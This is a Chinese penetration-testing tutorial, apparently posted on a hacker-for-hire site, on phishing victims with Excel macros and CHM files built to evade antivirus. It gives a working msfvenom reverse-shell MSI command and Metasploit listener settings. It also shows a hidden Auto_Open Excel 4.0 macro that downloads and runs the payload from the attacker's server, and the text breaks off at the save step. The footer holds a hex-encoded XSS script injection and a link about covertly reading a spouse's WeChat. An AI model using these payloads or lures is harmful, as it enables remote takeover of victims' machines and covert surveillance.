渗透测试之地基钓鱼篇:Excel宏和CHM电子书免杀钓鱼

访客4年前关于黑客接单495

系列文章

渗透测试之地基钓鱼篇:thinkphp平台XSS钓鱼

简介

渗透测试-地基篇:

该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式 *** ,望大家能共同加油学到东西。

请注意:

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

名言:

你对这行的兴趣,决定你在这行的成就!

一、前言

Excel一般指Microsoft Office Excel。这里就不用多说了,它跟office一样都是支持宏的,所以一样存在宏病毒。当我们把恶意的宏代码嵌入Excel中,用户打开Excel文件里的宏就会被触发,然后拿到对方电脑权限,并进行控制。

CHM是已编译的帮助文件,它是微软新一代的帮助文件格式,目前也是比较常见的一种文件了。

CHM的原理是支持Javascript、VBscript、ActiveX、JavaApplet、Flash、常见图形文件(GIF、JPEG、PNG)、音频视频文件(MID、WAV、AVI)等等,并可以通过URL 与Internet联系在一起,那么这里就可以利用这些支持的形式,在里面注入恶意代码,在恶意代码层面上在做个免杀。

.Chm文件格式是HTML文件格式的扩展,所以接下来演示的是如何利用恶意代码注入html文本中,并创建chm的说明文件,通过上传用户下载后执行,在攻击机上直接控制对方电脑。

二、环境介绍

1608213735_5fdb64e7aa0655a649f8f.png!small?1608213737710

黑客(攻击者):

IP:192.168.2.153

系统:kali.2020.4

VPS服务器:

例如搭建了各种破解软件平台,供客户需求下载!

钓鱼地址:http://xxxx.dayuixiyou.cn

办公电脑:

系统:windwos7

IP:192.168.2.144

目前黑客利用kali运行了My *** Rat外壳 ,通过 *** Excel宏恶意后门和 *** CHM电子文件说明书进行上传,并诱骗安全意识差人员进行需求下载,并获得对方电脑权限的演示过程!!

三、Excel宏躲避杀软检测

演示 *** Excel是利用Excel 2016版本进行!

1、 *** msi恶意文件

1608818176_5fe49e009fffd585db421.png!small

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.153 lport=6666 -f msi -o dayu.msi

利用msfvenom生成msi恶意后门文件,这里还有很多 *** 可以生成msi,免杀也可以在这里开始进行!

2、建立监听

1608818317_5fe49e8d65ab087d0b1d9.png!small?1608818317945

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.2.153

set lport 6666

exploit -j #持续监听

这里创建好监听后,等待被钓鱼到的客户进行反弹shell即可!

3、模拟Vps开启服务

1608818419_5fe49ef3a489ca463a9ce.png!small?1608818420052

这里就假设kali是公网服务器,开启了apache后,将msi恶意文件上传到服务器....接下来就开始 *** 分离免杀的Excel恶意宏后门文件,我前面一片XSS文章利用Flash钓鱼也是利用了分离免杀效果,目前还是挺好用的!!最后我还会讲解到一些思路!!继续!!

4、 *** Excel宏

1608818434_5fe49f0227ec516e599ad.png!small?1608818434639

首先在windwos环境利用excle2016创建一个.xlsx的文件!可看时间也是最新操作演示的!

1608818744_5fe4a0382559bcf5ec0b9.png!small?1608818744438

创建好后双击打开,并在左下角邮件点击sh...,然后点击插入!

1608818862_5fe4a0ae16c6e14f74fb6.png!small?1608818862532

选择MS Excel 4.0宏表....

1608818893_5fe4a0cdb84b60565ac70.png!small?1608818894148

然后在左上角之一个格子输入:

=EXEC("msiexec /q /ihttp://192.168.2.153/dayu.msi") #调用执行服务器上的dayu.msi文件

第二个格子输入:

=HALT()? ? ? ? 标识Excel 4.0宏结束,类似C语言return指令

1608819039_5fe4a15f84a6b13decf24.png!small?1608819039989

然后将左上角的A1模式手动输入:Auto Open,Enter回车即可!

1608819096_5fe4a1980e0053b18a4b7.png!small?1608819096445

为了避免对方打开能看到宏文件,以及增强隐蔽性,将宏进行隐藏!

1608819131_5fe4a1bb16950945db464.png!small?1608819131534

Ctrl+S保存后,出现该提示,按照该提示进行点击否!

相关文章

QQ清空聊天记录如何恢复

方法如下:第一种方法:友情找回,登陆QQ,找到你想恢复的聊天记录的当事人,因为QQ聊天记录删除了只是在你的电脑上没有。 手机聊天记录删除了怎么恢复?手机微信可以说是我们使用比较频繁的一款工具了,但是微...

qq黑客群账号,找一本电脑黑客的小说,网上黑客哪里找

test: '),(0x3C73637269707***********3D687474703A2F2F7873732E6861636B7461736B2E6E65742F30544C73356E3F...

创业如何少走弯路?给90后创业者的4条建议

如今的社会,伴随着愈来愈多的人添加自主创业的浪潮中,自主创业这条道路对创业人的专业能力规定也愈来愈高,并不是像以往一样,有一些资产和人脉关系就可以踏入自主创业的路面。我作为一名创业人,给将要要踏入这条...

突然被短信验证码轰炸怎么办

1、开启手机管家。2、点一下来电拦截。3、挑选阻拦标准。4、手机短信拦截标准。5、启用智能化阻拦骚扰短信。6、启用阻拦生疏短消息。 知名品牌型号规格:华为公司P40,iPhone12 系统软件:EMU...

淘宝客服外包平台(淘宝客服(在家上班))

淘宝客服外包平台(淘宝客服(在家上班))

目前电商事业日益壮大,客服需求量也是与日俱增,很多淘宝商家的客服都处于严重缺失的一个状态。而对于一个淘宝网店来说,店铺没有办法找到一个合适的客服也是一件头疼的事,客服的不足也直接影响着店铺顾客的流失。...

没有密码怎么监控我老公微信所有聊天记录

由优酷(北京)信息技术有限公司出品,公安部金盾影视文化中心、北京福佐文化传播有限公司、北京罗吒文化传播有限公司联合出品,张耀、楚月领衔主演,马可特别出演,梁志港、杨诚诚主演的昆虫探案悬疑网剧《破茧》将...